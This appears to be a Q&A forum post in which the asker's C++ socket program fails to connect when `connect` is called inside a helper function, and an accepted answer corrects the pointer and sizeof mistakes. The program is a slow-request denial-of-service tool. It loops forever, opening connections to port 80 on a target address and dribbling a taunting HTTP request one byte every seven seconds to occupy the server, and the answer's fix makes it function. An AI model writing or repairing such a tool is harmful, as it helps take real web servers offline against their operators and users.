# socket connecting in main but not inside a function

Tags: c++, sockets

i am trying to create a socket, connect method is working fine (i.e returning 0 if called from the main function) but not working fine(i.e return a non zero value) if called from some function other than main why? thanks in advance

```
#include<iostream>
#include<stdlib.h>
#include<sys/socket.h>
#include<sys/types.h>
#include<netinet/in.h>
#include<arpa/inet.h>//the new file.
#include<unistd.h>//for using the sleep function.
#include<string.h>
using namespace std;
//char request1[]="GET /index.html HTTP/1.1\r\n\r\n";
void T_occupy(char* request,int n,struct sockaddr_in* server_address,int time_slot){
    int my_socket;
    while(1){
            my_socket=socket(AF_INET,SOCK_STREAM,0);
            int connection_status=connect(my_socket,(struct sockaddr*)&server_address,sizeof(server_address));
            if(connection_status){
                    cout<<"error in establising the connection \n";
                    return;
            }
            int i;
            for(i=0;i<n;i++){
                    char temp=request[i];
                    send(my_socket,&temp,sizeof(temp),0);
                    sleep(time_slot);
            }
            close(my_socket);
    }

}
int main(int argc,char* argv[]){
    //first we will do thigns with only one thread.
    char* address;
    char* msg="GET   /Iamabouttoendyourstorybyhackingyouandyouwillnotbeabletoserveanyone.html HTTP/1.1\r\n\r\n";
    address=argv[1];
    struct sockaddr_in server_address;
    server_address.sin_family=AF_INET;
    server_address.sin_port=htons(80);
    inet_aton(address,(struct in_addr*)&server_address.sin_addr.s_addr);
    T_occupy(msg,strlen(msg),&server_address,7);
    return 0;
}
```

Comment: `using namespace std` is C++. not C.

Comment: Use a library that handles this for you. Look at curl https://curl.haxx.se/

Answer (score 0, accepted):

You're passing `&server_address`, which has type `struct sockaddr_in **` to `connect` which is expecting a `struct sockaddr_in *` casted to a `struct sockaddr *`.  You're also passing `sizeof(server_address)` which is the size of the pointer, not the size of the struct.

Remove the unneeded `&` in the second parameter and add `*` to the last:

```
int connection_status=connect(my_socket,(struct sockaddr*)server_address,sizeof(*server_address));
```